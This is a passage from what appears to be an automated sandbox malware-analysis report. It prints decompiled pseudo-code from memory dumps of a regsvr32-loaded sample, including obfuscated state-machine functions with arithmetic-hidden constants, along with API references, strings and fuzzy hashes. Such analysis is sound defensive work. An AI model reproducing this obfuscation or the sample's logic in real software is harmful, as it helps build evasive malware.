											_t862 = _t862 + 0x54;
											__eflags = _t711;
											if(__eflags != 0) {
												_t854 = 0x96ab2;
												while(1) {
													L1:
													_t675 = 0xafd1f;
													goto L2;
												}
											}
										} else {
											__eflags = _t854 - 0xdf238;
											if(__eflags != 0) {
												goto L25;
											} else {
												_v2648 = 0x5b7fe8;
												_t775 = 0x3b;
												_v2648 = _v2648 / _t775;
												_v2648 = _v2648 ^ 0x000a6a1f;
												_v2660 = 0x63510;
												_v2660 = _v2660 >> 1;
												_v2660 = _v2660 >> 0x10;
												_v2660 = _v2660 ^ 0x000ccaa5;
												_v2664 = 0x8ffdd5;
												_v2664 = _v2664 + 0xffff5061;
												_t776 = 0x38;
												_v2664 = _v2664 / _t776;
												_v2664 = _v2664 ^ 0x00049d13;
												_v2656 = 0xc4d33;
												_t777 = 0x71;
												_v2656 = _v2656 / _t777;
												_v2656 = _v2656 ^ 0x000398a4;
												E003C79D0(_v2648, _v2660, __eflags, _v2664, _v2636, _v2656);
												_t862 = _t862 + 0xc;
												_t854 = 0xf738;
												while(1) {
													L1:
													_t675 = 0xafd1f;
													goto L2;
												}
											}
											L29:
										}
									}
								}
							} else {
								if(_t868 == 0) {
									_v2652 = 0x411fa2;
									_t779 = 0x1d;
									_v2652 = _v2652 / _t779;
									_v2652 = _v2652 + 0x377b;
									_v2652 = _v2652 ^ 0x0002e36e;
									_v2660 = 0xaaba54;
									_v2660 = _v2660 | 0x65e51e5d;
									_v2660 = _v2660 ^ 0xe7af5730;
									_v2660 = _v2660 ^ 0x824f31ac;
									_v2656 = 0xe2bd99;
									_v2656 = _v2656 ^ 0x5f40c3a5;
									_v2656 = _v2656 ^ 0x5fac5822;
									_v2664 = 0xd10a22;
									_v2664 = _v2664 >> 0xc;
									_v2664 = _v2664 ^ 0x33045cd6;
									_v2664 = _v2664 ^ 0x330a28ab;
									E003C79D0(_v2652, _v2660, __eflags, _v2656, _t853, _v2664);
									_t862 = _t862 + 0xc;
									_t854 = 0xdf238;
									while(1) {
										L1:
										_t675 = 0xafd1f;
										goto L2;
									}
								} else {
									if(_t854 == 0x14eb) {
										_v2664 = 0x632039;
										_v2664 = _v2664 >> 0xf;
										_v2664 = _v2664 | 0x8ccebfbc;
										_v2664 = _v2664 ^ 0xf21fa8f5;
										_v2664 = _v2664 ^ 0x7ed84f7b;
										_v2640 = 0xd67e7e;
										_v2640 = _v2640 * 0xd;
										_v2640 = _v2640 ^ 0x0ae7fb97;
										_v2648 = 0xcec19a;
										_v2648 = _v2648 / _t756;
										_v2648 = _v2648 ^ 0x0009b0ff;
										_v2656 = 0x7c9240;
										_v2656 = _v2656 ^ 0x72efd03d;
										_v2656 = _v2656 ^ 0x72991fa6;
										_t725 = E003D8EF4(_v2632, _v2664, _v2640, _v2648, _v2636, _v2656);
										_t853 = _t725;
										_t862 = _t862 + 0x10;
										__eflags = _t725;
										_t675 = 0xafd1f;
										_t854 =  !=  ? 0xafd1f : 0xdf238;
										goto L2;
									} else {
										if(_t854 == 0xf738) {
											_v2660 = 0x5250ae;
											_t782 = 0xc;
											_v2660 = _v2660 / _t782;
											_v2660 = _v2660 ^ 0xe2d95149;
											_v2660 = _v2660 ^ 0xe2d771df;
											_v2664 = 0x4dc032;
											_v2664 = _v2664 ^ 0xe0a02225;
											_v2664 = _v2664 >> 5;
											_t783 = 0x42;
											_v2664 = _v2664 / _t783;
											_t667 =  &_v2664;
											 *_t667 = _v2664 ^ 0x001858ba;
											__eflags =  *_t667;
											return E003D4FB8(_v2628, _v2660, _v2664);
										}
										if(_t854 == 0x5c13b) {
											_v2640 = 0x9884;
											_v2640 = _v2640 | 0x46406229;
											_v2640 = _v2640 ^ 0x4640fa84;
											_v2648 = 0x31828a;
											_v2648 = _v2648 + 0x52cd;
											_v2648 = _v2648 ^ 0x0037461d;
											_v2652 = 0x6e4078;
											_v2652 = _v2652 >> 8;
											_v2652 = _v2652 + 0xffffe43a;
											_v2652 = _v2652 ^ 0x000c36ea;
											_v2656 = 0x24089b;
											_v2656 = _v2656 << 0xa;
											_v2656 = _v2656 ^ 0x9022e2e5;
											_v2660 = 0xbc5357;
											_v2660 = _v2660 ^ 0xdbba5cb3;
											_v2660 = _v2660 ^ 0xdcf24e2e;
											_v2660 = _v2660 ^ 0x07f16033;
											_v2664 = 0xa0423e;
											_v2664 = _v2664 | 0xe87b481d;
											_v2664 = _v2664 ^ 0xe3b5ddf2;
											_v2664 = _v2664 ^ 0x0b451b5b;
											_push(_t756);
											_push(_t756);
											E003CD5B0(_v2640,  &_v1044, _v2648, _v2652, _v2656, _v2660, _t756, _v2664);
											_t862 = _t862 + 0x20;
											_t854 = 0xd2d38;
											while(1) {
												L1:
												_t675 = 0xafd1f;
												goto L2;
											}
										} else {
											if(_t854 == 0x8d388) {
												_v2664 = 0xee3b1e;
												_v2664 = _v2664 + 0x3e78;
												_v2664 = _v2664 * 0x7f;
												_v2664 = _v2664 << 7;
												_v2664 = _v2664 ^ 0x272bd65f;
												_v2652 = 0x1681e9;
												_v2652 = _v2652 << 2;
												_v2652 = _v2652 + 0xffff8c69;
												_v2652 = _v2652 ^ 0x0050fe6e;
												_v2660 = 0xde5e2e;
												_v2660 = _v2660 << 6;
												_v2660 = _v2660 + 0xffff15f1;
												_v2660 = _v2660 ^ 0x3793d424;
												E003C5FA3(_v2664,  &_v2636,  &_v2628, _v2652, _v2660);
												_t862 = _t862 + 0xc;
												asm("sbb esi, esi");
												_t854 = (_t854 & 0xffff1db3) + 0xf738;
												while(1) {
													L1:
													_t675 = 0xafd1f;
													goto L2;
												}
											} else {
												if(_t854 != 0x96ab2) {
													goto L25;
												} else {
													_v2664 = 0x5e8fe;
													_v2664 = _v2664 + 0xf4b0;
													_v2664 = _v2664 ^ 0x0006ad0c;
													_v2624 = E003CB100();
													_v2660 = 0x88bd72;
													_v2660 = _v2660 >> 8;
													_v2660 = _v2660 << 0xb;
													_v2660 = _v2660 ^ 0x0445e801;
													_v2664 = 0xc9e909;
													_v2664 = _v2664 << 4;
													_v2664 = _v2664 ^ 0x2c740318;
													_v2664 = _v2664 ^ 0x20e31533;
													_v2652 = 0xbb8d90;
													_v2652 = _v2652 | 0x6ec56b43;
													_v2652 = _v2652 ^ 0x6ef15c78;
													_v2644 = 0x644d1a;
													_t859 = 0x13;
													_v2644 = _v2644 / _t859;
													_t860 = 0x77;
													_v2644 = _v2644 / _t860;
													_v2644 = _v2644 * 7;
													_v2644 = _v2644 ^ 0x0002a497;
													_v2620 = E003CB10B(_v2664, _v2652, _v2644, _t737) + _v2660 + E003CB10B(_v2664, _v2652, _v2644, _t737) + _v2660;
													_v2644 = 0xe3d857;
													_v2644 = _v2644 >> 5;
													_t792 = 0xb;
													_v2644 = _v2644 * 0x3f;
													_v2644 = _v2644 / _t792;
													_v2644 = _v2644 ^ 0x0038c76e;
													_v2664 = 0xf4388f;
													_t793 = 0x47;
													_v2664 = _v2664 * 0x2e;
													_v2664 = _v2664 | 0x14e3a102;
													_v2664 = _v2664 + 0xffff07ab;
													_v2664 = _v2664 ^ 0x3fec0f04;
													_v2660 = 0x7e1a04;
													_v2660 = _v2660 * 0x62;
													_v2660 = _v2660 << 7;
													_v2660 = _v2660 << 0xb;
													_v2660 = _v2660 ^ 0xd622406d;
													_v2652 = 0x8849cd;
													_v2652 = _v2652 + 0xffff2ff2;
													_v2652 = _v2652 | 0xd8a3fd73;
													_v2652 = _v2652 / _t793;
													_v2652 = _v2652 ^ 0x030c23b2;
													_v2656 = 0xb8be59;
													_v2656 = _v2656 + 0xd6d2;
													_v2656 = _v2656 ^ 0x00b0dec6;
													_v2648 = 0xe5003b;
													_v2648 = _v2648 + 0xffff3adf;
													_v2648 = _v2648 ^ 0x00eaf987;
													_v2640 = 0x77e6e;
													_v2640 = _v2640 >> 0xb;
													_v2640 = _v2640 ^ 0x000b3606;
													_t711 = E003C2CE1(_v2664, _v2660, _t754, _t754, _v2652, _v2656, _v2648, _t793,  &_v2628, _t793, _v2640, _v2644, _t754);
													_t862 = _t862 + 0x2c;
													if(_t711 != 0) {
														_t854 = 0x8d388;
														while(1) {
															L1:
															_t675 = 0xafd1f;
															L2:
															_t756 = 0x5d;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
							}
							return _t711;
							goto L29;
							L25:
							__eflags = _t854 - 0x54f5d;
						} while (__eflags != 0);
						return _t675;
					}
				}
			}

0x003c62c0
0x003c62c5
0x003c62ca
0x003c62d2
0x003c62da
0x003c62e2
0x003c62f3
0x003c62f7
0x003c62f9
0x003c6301
0x003c630a
0x003c630f
0x003c6313
0x003c6315
0x003c6315
0x003c6315
0x003c631a
0x003c631a
0x003c631c
0x003c631d
0x003c631d
0x003c631d
0x003c6323
0x003c6812
0x003c6818
0x003c6e3f
0x003c6e4c
0x003c6e4d
0x003c6e58
0x003c6e60
0x003c6e68
0x003c6e70
0x003c6e78
0x003c6e80
0x003c6e88
0x003c6e8d
0x003c6e95
0x003c6e9d
0x003c6ea5
0x003c6eaa
0x003c6eb2
0x003c6eb2
0x003c6eb2
0x003c6ed1
0x003c6ed6
0x003c6ed9
0x003c6ede
0x003c6ee5
0x00000000
0x003c681e
0x003c681e
0x003c6820
0x003c6c93
0x003c6c9b
0x003c6ca3
0x003c6cab
0x003c6cb3
0x003c6cbb
0x003c6cc3
0x003c6ccb
0x003c6cd3
0x003c6cdb
0x003c6ce3
0x003c6ce8
0x003c6d05
0x003c6d0a
0x003c6d15
0x003c6d1f
0x003c6d29
0x003c6d31
0x003c6d39
0x003c6d41
0x003c6d49
0x003c6d51
0x003c6d59
0x003c6d61
0x003c6d6b
0x003c6d77
0x003c6d7a
0x003c6d82
0x003c6d87
0x003c6db2
0x003c6db7
0x003c6dbf
0x003c6dc7
0x003c6dcf
0x003c6dd7
0x003c6ddf
0x003c6de7
0x003c6def
0x003c6df7
0x003c6dff
0x003c6e07
0x003c6e15
0x003c6e19
0x003c6e2d
0x003c6e32
0x003c6e35
0x00000000
0x003c6826
0x003c6826
0x003c682c
0x003c68e2
0x003c68f1
0x003c68f6
0x003c68fe
0x003c6906
0x003c690e
0x003c6916
0x003c691e
0x003c6926
0x003c692e
0x003c6936
0x003c694a
0x003c694f
0x003c695a
0x003c696a
0x003c696f
0x003c6975
0x003c697d
0x003c6989
0x003c6993
0x003c6997
0x003c699f
0x003c69a7
0x003c69af
0x003c69b7
0x003c69bc
0x003c69d7
0x003c69e1
0x003c69e9
0x003c69ee
0x003c69f6
0x003c69fe
0x003c6a06
0x003c6a0e
0x003c6a16
0x003c6a1e
0x003c6a26
0x003c6a2e
0x003c6a42
0x003c6a47
0x003c6a4f
0x003c6a54
0x003c6a5c
0x003c6a61
0x003c6a65
0x003c6a6d
0x003c6a75
0x003c6a7d
0x003c6a85
0x003c6a8d
0x003c6a95
0x003c6a9d
0x003c6aa5
0x003c6aad
0x003c6ab5
0x003c6abd
0x003c6ac2
0x003c6adf
0x003c6ae4
0x003c6af9
0x003c6afe
0x003c6b04
0x003c6b0c
0x003c6b14
0x003c6b19
0x003c6b22
0x003c6b26
0x003c6b31
0x003c6b3d
0x003c6b45
0x003c6b4d
0x003c6b52
0x003c6b5a
0x003c6b62
0x003c6b6a
0x003c6b6f
0x003c6b91
0x003c6b96
0x003c6ba1
0x003c6ba8
0x003c6bad
0x003c6bb5
0x003c6bbd
0x003c6bc5
0x003c6bcd
0x003c6bd3
0x003c6bd8
0x003c6bde
0x003c6be6
0x003c6bf2
0x003c6bf7
0x003c6c01
0x003c6c05
0x003c6c09
0x003c6c0e
0x003c6c1e
0x003c6c22
0x003c6c27
0x003c6c2f
0x003c6c38
0x003c6c40
0x003c6c48
0x003c6c50
0x003c6c58
0x003c6c60
0x003c6c68
0x003c6c79
0x003c6c7e
0x003c6c81
0x003c6c83
0x003c6c89
0x003c6315
0x003c6315
0x003c6315
0x00000000
0x003c6315
0x003c6315
0x003c6832
0x003c6832
0x003c6838
0x00000000
0x003c683e
0x003c683e
0x003c684e
0x003c6853
0x003c6859
0x003c6861
0x003c6869
0x003c686d
0x003c6872
0x003c687a
0x003c6882
0x003c688e
0x003c6893
0x003c6899
0x003c68a1
0x003c68ad
0x003c68b0
0x003c68b4
0x003c68d0
0x003c68d5
0x003c68d8
0x003c6315
0x003c6315
0x003c6315
0x00000000
0x003c6315
0x003c6315
0x00000000
0x003c6838
0x003c682c
0x003c6820
0x003c6329
0x003c6329
0x003c6773
0x003c6783
0x003c6786
0x003c678a
0x003c6792
0x003c679a
0x003c67a2
0x003c67aa
0x003c67b2
0x003c67ba
0x003c67c2
0x003c67ca
0x003c67d2
0x003c67da
0x003c67df
0x003c67e7
0x003c6800
0x003c6805
0x003c6808
0x003c6315
0x003c6315
0x003c6315
0x00000000
0x003c6315
0x003c632f
0x003c6335
0x003c66cb
0x003c66d5
0x003c66da
0x003c66e2
0x003c66ea
0x003c66f2
0x003c66ff
0x003c6703
0x003c670b
0x003c6719
0x003c671d
0x003c6725
0x003c672d
0x003c6735
0x003c6755
0x003c675a
0x003c675c
0x003c675f
0x003c6766
0x003c676b
0x00000000
0x003c633b
0x003c6341
0x003c6ef4
0x003c6f04
0x003c6f09
0x003c6f0f
0x003c6f17
0x003c6f1f
0x003c6f27
0x003c6f2f
0x003c6f38
0x003c6f3b
0x003c6f3f
0x003c6f3f
0x003c6f3f
0x00000000
0x003c6f58
0x003c634d
0x003c65f5
0x003c6604
0x003c660c
0x003c6614
0x003c661c
0x003c6624
0x003c662c
0x003c6634
0x003c6639
0x003c6641
0x003c6649
0x003c6651
0x003c6656
0x003c665e
0x003c6666
0x003c666e
0x003c6676
0x003c667e
0x003c6686
0x003c668e
0x003c6696
0x003c669e
0x003c669f
0x003c66b9
0x003c66be
0x003c66c1
0x003c6315
0x003c6315
0x003c6315
0x00000000
0x003c6315
0x003c6353
0x003c6359
0x003c6563
0x003c656f
0x003c657c
0x003c6584
0x003c6589
0x003c6591
0x003c6599
0x003c659e
0x003c65a6
0x003c65ae
0x003c65b6
0x003c65bb
0x003c65c3
0x003c65d8
0x003c65dd
0x003c65e2
0x003c65ea
0x003c6315
0x003c6315
0x003c6315
0x00000000
0x003c6315
0x003c635f
0x003c6365
0x00000000
0x003c636b
0x003c636b
0x003c6373
0x003c637b
0x003c6390
0x003c6394
0x003c639c
0x003c63a1
0x003c63a6
0x003c63ae
0x003c63b6
0x003c63bb
0x003c63c3
0x003c63cb
0x003c63d3
0x003c63db
0x003c63e3
0x003c63f1
0x003c63f6
0x003c6400
0x003c6404
0x003c640d
0x003c6411
0x003c6432
0x003c6436
0x003c643e
0x003c644c
0x003c644d
0x003c6459
0x003c645f
0x003c6467
0x003c6474
0x003c6475
0x003c6479
0x003c6481
0x003c6489
0x003c6491
0x003c649e
0x003c64a2
0x003c64a7
0x003c64ac
0x003c64b4
0x003c64bc
0x003c64c4
0x003c64d2
0x003c64d6
0x003c64de
0x003c64e6
0x003c64ee
0x003c64f6
0x003c64fe
0x003c650a
0x003c6512
0x003c651a
0x003c651f
0x003c6549
0x003c654e
0x003c6553
0x003c6559
0x003c6315
0x003c6315
0x003c6315
0x003c631a
0x003c631c
0x00000000
0x003c631c
0x003c6315
0x003c6553
0x003c6365
0x003c6359
0x003c634d
0x003c6335
0x003c6329
0x003c6f63
0x00000000
0x003c6ee6
0x003c6ee6
0x003c6ee6
0x00000000
0x003c631d
0x003c631a

Strings

Td, xrefs: 003C6DEF
8-, xrefs: 003C6826
E\T, xrefs: 003C6E95
eP<, xrefs: 003C6A5C
JeG, xrefs: 003C69AF
;, xrefs: 003C64F6
8-, xrefs: 003C66C1
:QV, xrefs: 003C6BCD
j8, xrefs: 003C6CAB
)b@F, xrefs: 003C6604
jeU, xrefs: 003C6CA3

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePath
String ID: )b@F$8-$8-$;$E\T$JeG$Td$eP<$j8$jeU$:QV
API String ID: 1943059022-2060498324
Opcode ID: 0814b2e4fdc6ff27a45ae815ba8940005d0d1d1632e3b1610d72cb8803cae00c
Instruction ID: efe76caa4ea0a47f61adceeb03036a0c4e833c0ff320aa49790d417586c70714
Opcode Fuzzy Hash: 0814b2e4fdc6ff27a45ae815ba8940005d0d1d1632e3b1610d72cb8803cae00c
Instruction Fuzzy Hash: 836202724083429FC349CF25D58A90BBBE1BBD8758F108A1DF4D9A6261D7B4CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1002D9F0 Relevance: 12.2, APIs: 8, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1002D9F0() {
				struct HBITMAP__* _t43;
				long _t50;
				signed int _t52;
				struct HRSRC__* _t118;
				struct HDC__* _t124;
				struct HINSTANCE__* _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				void* _t131;

				_t125 =  *(_t129 + 0x10);
				_t118 = FindResourceA(_t125,  *(_t129 + 8), 2);
				if(_t118 != 0) {
					_t50 = SizeofResource(_t125, _t118);
					_t126 = LoadResource(_t125, _t118);
					if(_t126 != 0) {
						_t128 = GlobalAlloc(0x40, _t50);
						if(_t128 != 0) {
							_t52 = _t50 >> 2;
							memcpy(_t128, _t126, _t52 << 2);
							memcpy(_t126 + _t52 + _t52, _t126, _t50 & 0x00000003);
							_t131 = _t129 + 0x18;
							 *(_t131 + 0x10) = 0;
							 *(_t131 + 0x10) =  *(_t131 + 0x20) >> 0x10;
							 *(_t128 + 0x28) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
							 *(_t131 + 0x10) = 0;
							 *(_t131 + 0x10) =  *(_t131 + 0x28) >> 0x10;
							 *(_t128 + 0x44) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
							 *(_t131 + 0x10) = 0;
							 *(_t131 + 0x10) =  *(_t131 + 0x24) >> 0x10;
							 *(_t128 + 0x48) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
							 *((intOrPtr*)(_t128 + 0x64)) = 0xbadbad;
							 *((intOrPtr*)(_t128 + 0x54)) = 0xbadbad;
							 *((intOrPtr*)(_t128 + 0x50)) = 0xbadbad;
							_t124 = GetDC(0);
							_t25 = _t128 + 0x68; // 0x68
							_t43 = CreateDIBitmap(_t124, _t128, 4, _t25, _t128, 0);
							ReleaseDC(0, _t124);
							GlobalFree(_t128);
							return _t43;
						} else {
							return 0;
						}
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x1002d9f9
0x1002da09
0x1002da0d
0x1002da23
0x1002da2d
0x1002da31
0x1002da48
0x1002da4c
0x1002da5e
0x1002da61
0x1002da68
0x1002da68
0x1002da74
0x1002da82
0x1002da9c
0x1002da9f
0x1002daa9
0x1002dac5
0x1002dacd
0x1002dad7
0x1002daf3
0x1002db13
0x1002db33
0x1002db4d
0x1002db56
0x1002db5b
0x1002db63
0x1002db6e
0x1002db75
0x1002db84
0x1002da4e
0x1002da57
0x1002da57
0x1002da33
0x1002da3c
0x1002da3c
0x1002da0f
0x1002da18
0x1002da18

APIs

FindResourceA.KERNEL32 ref: 1002DA03
SizeofResource.KERNEL32(?,00000000,?,75427D2F,00000000,75426C3C,?,?,?,?,?,?,?,?,1002B5F1,00000001), ref: 1002DA1D
LoadResource.KERNEL32(?,00000000,?,75427D2F,00000000,75426C3C,?,?,?,?,?,?,?,?,1002B5F1,00000001), ref: 1002DA27

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindLoadSizeof
String ID:
API String ID: 507330600-0
Opcode ID: 699fdbbd742f8163e1d1b4da5d2f171252028a4d90f18c1b8e817c6504caf63c
Instruction ID: 24c5b263716d5aa65b48799f497db1f41b0f2acf229dfb3cc9ff479c23ecd271
Opcode Fuzzy Hash: 699fdbbd742f8163e1d1b4da5d2f171252028a4d90f18c1b8e817c6504caf63c
Instruction Fuzzy Hash: AC41C1327046165BF30CDE299856AAF77D2EBC9250F44863EF94AC3381DB719909C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 100489BD Relevance: 12.1, APIs: 8, Instructions: 72
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100489BD() {
				CHAR* _t29;
				CHAR* _t36;
				void* _t38;
				CHAR* _t47;
				void* _t53;

				E1001A9E0(0x10077be4, _t53);
				_t47 =  *(_t53 + 8);
				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
					_t29 =  *0x1008f630; // 0x1008f644
					 *(_t53 + 8) = _t29;
					_push(_t53 + 8);
					 *(_t53 - 4) = 0;
					E10048A8D(_t53, _t47);
					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
							CharUpperA(_t47);
						}
						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
							if(_t38 != 0xffffffff) {
								FindClose(_t38);
								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
							}
						}
						_push(1);
						_pop(0);
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E1004591E(_t53 + 8);
					_t36 = 0;
				} else {
					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}

0x100489c2
0x100489cf
0x100489e8
0x100489fc
0x10048a01
0x10048a09
0x10048a0b
0x10048a0e
0x10048a2b
0x10048a31
0x10048a34
0x10048a34
0x10048a3e
0x10048a4a
0x10048a53
0x10048a56
0x10048a66
0x10048a66
0x10048a53
0x10048a6c
0x10048a6e
0x10048a6e
0x10048a6f
0x10048a76
0x10048a7b
0x100489ea
0x100489ef
0x100489f5
0x100489f5
0x10048a82
0x10048a8a

APIs

__EH_prolog.LIBCMT ref: 100489C2
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 100489E0
lstrcpynA.KERNEL32(?,?,00000104), ref: 100489EF
GetVolumeInformationA.KERNEL32 ref: 10048A23
CharUpperA.USER32 ref: 10048A34
FindFirstFileA.KERNEL32(?,?), ref: 10048A4A
FindClose.KERNEL32(00000000), ref: 10048A56
lstrcpyA.KERNEL32(?,?), ref: 10048A66

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: 98d256d2ceb67bdc2740bc61ef5a13aea790b923ac873374be6b734f2f41266b
Instruction ID: 185c9a5a8df1bb421e50b4c10dd5f334c215443a977e2082eb5aa643f9a1bced
Opcode Fuzzy Hash: 98d256d2ceb67bdc2740bc61ef5a13aea790b923ac873374be6b734f2f41266b
Instruction Fuzzy Hash: 1E213B7190002AAAEB11DF64CC48AEF7FB8FF452A4F104126F919E6060D7709A55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D6B98 Relevance: 11.7, Strings: 9, Instructions: 434
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003D6B98(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				void* _t419;
				void* _t421;
				void* _t426;
				signed int* _t441;
				signed int* _t445;
				signed int _t450;
				signed int _t458;
				signed int _t460;
				signed int _t463;
				signed int* _t464;
				signed int _t471;
				signed int _t481;
				signed int _t484;
				signed int* _t495;
				signed int _t496;
				signed int _t498;
				signed int _t499;
				signed int _t503;
				signed int _t518;
				void* _t534;
				signed int _t536;
				signed int _t537;
				void* _t538;
				void* _t539;
				void* _t543;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t419);
				_t539 = _t538 + 0x20;
				_v288 = 0x81326;
				_t536 = 0;
				_t535 = _v288;
				_t481 = 0;
				do {
					_t421 = 0x6247a;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t421 - 0x4dea1;
							if(_t543 <= 0) {
							}
							L3:
							if(_t543 == 0) {
								_v312 = 0xbcd60a;
								_v312 = _v312 + 0x3ad5;
								_v312 = _v312 << 0xd;
								_v312 = _v312 ^ 0xa21be400;
								__eflags = _v280 - _v312;
								if(_v280 >= _v312) {
									_t460 = E003C7AB6( &_v284,  &_v276);
								} else {
									_t460 = E003DEECF( &_v284);
								}
								_t535 = _t460;
								__eflags = _t460;
								if(__eflags == 0) {
									_t421 = 0x290aa;
								} else {
									_t421 = 0x5b922;
								}
								while(1) {
									L2:
									_t543 = _t421 - 0x4dea1;
									if(_t543 <= 0) {
									}
									goto L26;
								}
								goto L3;
							}
							if(_t421 == 0x573d) {
